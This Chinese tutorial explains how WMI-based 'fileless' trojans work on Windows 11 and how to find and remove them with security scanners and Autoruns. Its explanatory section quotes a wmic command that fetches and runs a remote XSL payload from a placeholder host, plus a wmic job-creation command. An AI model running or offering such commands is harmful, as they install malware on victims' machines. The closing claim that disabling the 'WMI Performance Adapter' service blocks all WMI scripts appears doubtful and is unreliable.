Win11系統(tǒng)如何完美查殺WMI木馬 WMI木馬防范教程

Win11系統(tǒng)WMI木馬查殺教程!WMI(即Windows Management Instrumentation的簡(jiǎn)稱)是Windows的一個(gè)核心組件。我們可以借助該組件實(shí)現(xiàn)腳本部署、進(jìn)程枚舉、監(jiān)控目錄修改等常見的操作,一些不懷好意的開發(fā)者則利用WMI的這些特性生成木馬來(lái)危害我們的電腦。由于WMI是系統(tǒng)組件,這樣WMI木馬可以實(shí)現(xiàn)“無(wú)文件”方式運(yùn)行,難以被分析及檢測(cè)到。那么如果電腦被WMI木馬入侵會(huì)有什么表現(xiàn),我們又該怎樣對(duì)其進(jìn)行查殺和防范呢?
1. 了解WMI惡意軟件的運(yùn)行機(jī)制
如上所述,WMI具備的功能非常豐富,對(duì)于黑客來(lái)說(shuō)只要利用其中的命令就可以完成很多操作。比如獲得相應(yīng)的權(quán)限后,在目標(biāo)電腦上使用“wmic os get /FORMAT:"http://www.xxxx.com:80/123.xsl"”命令就可以實(shí)現(xiàn)從網(wǎng)站服務(wù)器上下載所需的惡意軟件123.xsl(圖1)。
當(dāng)然在實(shí)際運(yùn)行中,這些惡意軟件還可以利用WMI進(jìn)行更多的操作,如使用“wmic job call create "123.exe",0,0,true,false,********154800.000000+480”命令創(chuàng)建一個(gè)在后臺(tái)運(yùn)行的任務(wù)計(jì)劃,甚至可以執(zhí)行創(chuàng)建系統(tǒng)服務(wù)、將DLL文件注入系統(tǒng)進(jìn)程等操作。因?yàn)檫@里使用的都是系統(tǒng)命令(wmic.exe),并不像常規(guī)的木馬、病毒那樣由本體執(zhí)行,所以稱之為“無(wú)文件”(嚴(yán)格來(lái)說(shuō)是WMI腳本運(yùn)行,腳本被觸發(fā)后執(zhí)行下載木馬等操作)方式運(yùn)行。比如臭名昭著的“KingMiner挖礦木馬”,它通過(guò)WMI事件訂閱來(lái)不斷地觸發(fā)木馬在后臺(tái)運(yùn)行。
●火速鏈接:
本刊2018年6期文章《解決WMI進(jìn)程資源占用的問(wèn)題》介紹了WMI的相關(guān)知識(shí)。
2. 發(fā)現(xiàn)和識(shí)別WMI惡意軟件
WMI木馬的一個(gè)重要特性就是借助WMI腳本來(lái)下載或者激活木馬運(yùn)行。比如某WMI挖礦木馬感染電腦后會(huì)在系統(tǒng)里生成一個(gè)任務(wù)計(jì)劃,任務(wù)會(huì)在后臺(tái)連接到服務(wù)器下載挖礦木馬。挖礦木馬運(yùn)行后會(huì)占用系統(tǒng)大量的資源和帶寬,導(dǎo)致Windows在日常使用時(shí)運(yùn)行緩慢,網(wǎng)頁(yè)打開速度也變得很慢,且電腦的硬盤指示燈一直在閃爍(因?yàn)槟抉R會(huì)在后臺(tái)不斷地讀取數(shù)據(jù))。如果自己的電腦在使用時(shí)有上述的異?,F(xiàn)象,那么就需要使用安全軟件檢查是否中了木馬。
Windows 10用戶可以先使用系統(tǒng)自帶的“安全中心”進(jìn)行查殺,如果無(wú)法解決問(wèn)題則可以借助一些木馬專殺軟件,如火絨惡性木馬專殺工具(https://bbs.huorong.cn/thread-18575-1-1.html)進(jìn)行查殺,啟動(dòng)軟件后點(diǎn)擊“立即掃描”,常見的木馬(包括WMI木馬)一般都可以被自動(dòng)查殺(圖2)。
不過(guò),如果中了WMI木馬,安全軟件只會(huì)將WMI腳本下載的木馬文件刪除,但是無(wú)法完全斬?cái)郬MI木馬文件的下載途徑,如上述介紹的WMI挖礦木馬就是利用任務(wù)計(jì)劃進(jìn)行下載。因?yàn)槿蝿?wù)計(jì)劃中并沒(méi)有惡意軟件,安全軟件是不會(huì)將其刪除的,所以通過(guò)專殺軟件刪除木馬后,每次重啟系統(tǒng)掃描后還是一直提示發(fā)現(xiàn)木馬文件,那么就極可能中了WMI木馬,這時(shí)就還需要對(duì)系統(tǒng)的啟動(dòng)項(xiàng)進(jìn)行檢查,查看是否有異常的啟動(dòng)項(xiàng)。
系統(tǒng)啟動(dòng)項(xiàng)檢查可以借助Autoruns來(lái)完成(https://docs.microsoft.com/zh-cn/sysinternals/downloads/autoruns),啟動(dòng)程序后它會(huì)自動(dòng)對(duì)本機(jī)所有的啟動(dòng)項(xiàng)目進(jìn)行檢測(cè),包括計(jì)劃任務(wù)、服務(wù)、WMI等(圖3)。
比如筆者公司的一臺(tái)電腦在執(zhí)行安全掃描時(shí)就發(fā)現(xiàn)木馬文件無(wú)法徹底刪除的現(xiàn)象,在本機(jī)運(yùn)行Autoruns后切換到“計(jì)劃任務(wù)”,在打開的窗口中就可以看到后臺(tái)所有的任務(wù)計(jì)劃。對(duì)于沒(méi)有數(shù)字簽名的任務(wù),程序會(huì)使用淺紅色進(jìn)行標(biāo)注,可以看到本機(jī)中一個(gè)名為“lsmosee”的任務(wù)極為可疑,它加載的是本機(jī)臨時(shí)目錄中的一個(gè)VBS文件(圖4)。
在上圖選中“lsmosee”并右擊,選擇“跳轉(zhuǎn)到文件夾”,在打開的文件夾中根據(jù)圖上“鏡像路徑”的提示,使用記事本打開“54236.vbs”文件,其中顯示的正是一些WMI腳本的內(nèi)容,它的作用就是在后臺(tái)定時(shí)下載木馬文件?,F(xiàn)在按提示將其刪除。接著返回上圖,選中“lsmosee”任務(wù)并點(diǎn)擊“刪除”,這樣就可以切斷木馬的下載通道。最后使用火絨安全軟件再掃描一遍電腦,刪除其他帶毒的文件后,問(wèn)題得到順利的解決(圖5)。
3. 一勞永逸封禁WMI木馬下載
WMI木馬難以查殺的原因就是由于它的下載方式是通過(guò)WMI腳本實(shí)現(xiàn),而且WMI腳本激活的方法很多(如上例為任務(wù)計(jì)劃,有些則是使用進(jìn)程注入等),不過(guò)WMI腳本的運(yùn)行要依賴“WMI Performance Adapter”服務(wù),因此對(duì)于個(gè)人用戶來(lái)說(shuō),可以通過(guò)停用服務(wù)的方法來(lái)禁止WMI腳本的運(yùn)行。在桌面的任務(wù)欄搜索框中輸入“服務(wù)”,打開服務(wù)管理組件后找到上述服務(wù),雙擊打開后將其停止,并將其啟動(dòng)類型設(shè)置為“禁用”,這樣本機(jī)所有的WMI腳本就無(wú)法運(yùn)行了(圖6)。
注意:
禁用WMI服務(wù)可能會(huì)導(dǎo)致一些網(wǎng)絡(luò)服務(wù)無(wú)法使用。禁用服務(wù)如果影響電腦使用,請(qǐng)及時(shí)進(jìn)行恢復(fù)。
以上就是腳本之家小編給大家分享的Win11系統(tǒng)WMI木馬查殺教程了, 希望大家喜歡!
相關(guān)文章
Win11 Dev 26200.5562預(yù)覽版發(fā)布:附KB5055642更新內(nèi)容匯總
微軟今天測(cè)試了適用于 Windows 11 的 KB5055642 更新,用戶安裝后版本號(hào)升Win11 Dev 26200.5562 預(yù)覽版,這個(gè)版本主要帶來(lái)AI 閱讀與云端照片搜索2025-04-22Win10 MBR分區(qū)格式無(wú)損數(shù)據(jù)升級(jí)到Win11 GPT分區(qū)格式的技巧
輕松升級(jí)Win11!在不影響數(shù)據(jù)的情況下,如何將MBR分區(qū)格式的Windows10系統(tǒng)升級(jí)到GPT分區(qū)格式的Windows11系統(tǒng)?下面我們就來(lái)看看詳細(xì)的圖文教程2025-04-22Win11 Beta 26120.3872預(yù)覽版發(fā)布:附KB5055640完整更新日志
今天微軟發(fā)布了測(cè)試適用于 Windows 11 24H2 的 KB5055640 更新,用戶安裝后版本號(hào)升至 ,Win11 Beta 26120.3872預(yù)覽版,這個(gè)版本增強(qiáng)Click to Do文本操作等2025-04-22引入WGC技術(shù)! Win11 24H2 修復(fù)Chrome等瀏覽器屏幕共享色彩失真問(wèn)題
據(jù)知名科技媒體Windows Latest報(bào)道,微軟在其最新的Windows 11 24H2版本中,引入了一項(xiàng)名為WGC的新技術(shù),旨在解決用戶在屏幕共享時(shí)遇到的色彩失真問(wèn)題2025-04-22Win11 24H2 更新引發(fā) SAP GUI 崩潰等兼容性問(wèn)題:微軟緊急推出修復(fù)方案
Win11 24H2最新更新存在嚴(yán)重Bug,部分設(shè)備安裝四月累積更新(KB5055523)及三月預(yù)覽更新(KB5053656)后,可能觸發(fā)藍(lán)屏死機(jī),錯(cuò)誤代碼為0x18B(SECURE_KERNEL_ERROR),目前2025-04-21Win11 Beta 預(yù)覽版日歷彈窗新增時(shí)鐘功能:能精確到秒
微軟在最新的Win11 Beta 22635.5240預(yù)覽版中為任務(wù)欄日歷彈窗新增了時(shí)鐘功能,支持精確顯示秒數(shù),此前代碼顯示,該功能曾在Win 10中被移除,如今在Windows 11上回歸2025-04-21快速關(guān)閉無(wú)響應(yīng)程序利器! Win11任務(wù)欄結(jié)束任務(wù)按鈕使用攻略
任務(wù)欄直接結(jié)束任務(wù),Win11有個(gè)功能,允許用戶在任務(wù)欄的右鍵菜單中直接添加“結(jié)束任務(wù)”按鈕,這極大地簡(jiǎn)化了關(guān)閉無(wú)響應(yīng)程序的流程2025-04-21Win11文件資源管理器迎來(lái)升級(jí):主題色適配與進(jìn)度條細(xì)節(jié)調(diào)整
微軟正在對(duì) Win11 的文件資源管理器進(jìn)行一些微妙的界面升級(jí),這些改進(jìn)或許能讓其看起來(lái)更加精致2025-04-21Win11 RP 26100.3909 更新KB5055627發(fā)布:擱置分享修圖功能
微軟測(cè)試適用于 Windows 11 24H2 的 KB5055627 更新,用戶安裝后版本號(hào)升至 Build 26100.3909,這個(gè)版本主要新增擱置分享修圖功能,定制鎖屏天氣小部件2025-04-21Win11 23H2 Beta 22635.5240預(yù)覽版發(fā)布:附KB5055645完整更新日志
微軟測(cè)試適用于 Win11 23H2 的 KB5055645 更新,用戶安裝后版本號(hào)升至 Build 22635.5240,這個(gè)版本主要修復(fù)文件管理器深色模式顯示問(wèn)題2025-04-21